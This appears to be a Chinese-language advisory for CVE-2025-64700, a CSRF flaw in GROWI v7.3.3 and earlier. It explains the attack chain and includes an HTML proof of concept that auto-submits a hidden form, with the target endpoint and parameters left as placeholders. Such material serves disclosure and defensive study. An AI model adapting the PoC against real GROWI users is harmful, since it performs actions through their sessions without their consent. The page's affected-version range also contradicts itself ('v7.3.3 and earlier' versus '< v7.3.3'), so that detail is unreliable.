GROWI v7.3.3及更早版本CSRF跨站请求伪造漏洞

漏洞信息

漏洞编号

CVE-2025-64700

漏洞类型

CSRF（跨站请求伪造）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

GROWI

漏洞概述

GROWI v7.3.3及更早版本存在跨站请求伪造（CSRF）漏洞。该漏洞允许攻击者构造恶意网页，当已登录GROWI的用户访问该页面时，浏览器会自动向GROWI服务器发送携带用户认证凭证的恶意请求。由于GROWI应用程序未对关键操作实施充分的CSRF令牌验证机制，攻击者可以诱骗用户在不知情的情况下执行非预期的操作，如修改用户设置、创建/删除内容等。此漏洞的CVSS评分为4.3，属于中等严重程度，攻击复杂度低，但需要用户交互。攻击者无需获取用户凭证，仅需诱导用户访问恶意页面即可发起攻击。该漏洞由JPCERT/CC的安全研究人员vultures发现并报告。

技术细节

跨站请求伪造（CSRF）是一种利用用户已认证身份的攻击方式。在GROWI v7.3.3及更早版本中，应用程序对部分关键操作缺少适当的CSRF防护机制。攻击者可以创建一个包含恶意表单的网页，该表单会自动提交到GROWI的目标端点。当已登录GROWI的用户访问该恶意页面时，浏览器会携带用户的会话Cookie自动发送POST请求。GROWI服务器收到请求后，由于请求携带了有效的用户认证信息，会认为是合法用户发起的操作而执行相应命令。攻击者可利用此漏洞执行任何该用户有权限执行的操作，如修改账户设置、创建/编辑/删除页面内容等。CVSS向量显示攻击复杂度低（AC:L），无需认证（PR:N），但需要用户交互（UI:R），对机密性影响低（C:L），对完整性影响低（I:L），对可用性无影响（A:N）。

攻击链分析

STEP 1

步骤1

攻击者识别GROWI v7.3.3或更早版本中缺少CSRF保护的关键功能端点

STEP 2

步骤2

攻击者创建恶意HTML页面，包含自动提交的表单，指向GROWI的漏洞端点

STEP 3

步骤3

攻击者通过社会工程学手段（如钓鱼邮件、恶意链接等）诱导已登录GROWI的用户访问恶意页面

STEP 4

步骤4

用户浏览器加载恶意页面后，自动向GROWI服务器发送POST请求，同时携带用户的有效会话Cookie

STEP 5

步骤5

GROWI服务器收到请求后，验证用户身份后执行攻击者预设的操作，完成CSRF攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-64700 -->
<!-- This PoC demonstrates the CSRF vulnerability in GROWI v7.3.3 and earlier -->
<!DOCTYPE html>
<html>
<head>
    <title>GROWI CSRF PoC - CVE-2025-64700</title>
</head>
<body>
    <h1>GROWI CSRF Vulnerability PoC</h1>
    <p>This page demonstrates the CSRF vulnerability in GROWI v7.3.3 and earlier.</p>
    
    <!-- Auto-submit form to trigger malicious request -->
    <form id="csrf-form" action="https://target-growi-server/api/v1/endpoint" method="POST" style="display:none;">
        <!-- Replace with actual vulnerable endpoint -->
        <input type="hidden" name="_csrf" value="attacker-controlled-or-empty">
        <input type="hidden" name="action" value="malicious-action">
        <input type="hidden" name="param" value="value">
    </form>
    
    <script>
        // Auto-submit the form when page loads
        document.getElementById('csrf-form').submit();
    </script>
    
    <p>If you see this message, the form has been submitted.</p>
</body>
</html>

影响范围

GROWI < v7.3.3

防御指南

临时缓解措施

在官方修复版本发布前，可以通过配置Web应用防火墙（WAF）规则来缓解CSRF攻击风险。同时提醒用户不要点击来源不明的链接，特别是那些要求登录的链接。如果发现异常操作记录，应立即检查账户设置和活动日志。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-64700
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-64700
3 Details https://www.cvedetails.com/cve/CVE-2025-64700/
4 VulDB https://vuldb.com/cve/CVE-2025-64700
5 Link https://growi.co.jp/news/40/
6 Link https://jvn.jp/en/jp/JVN55745775/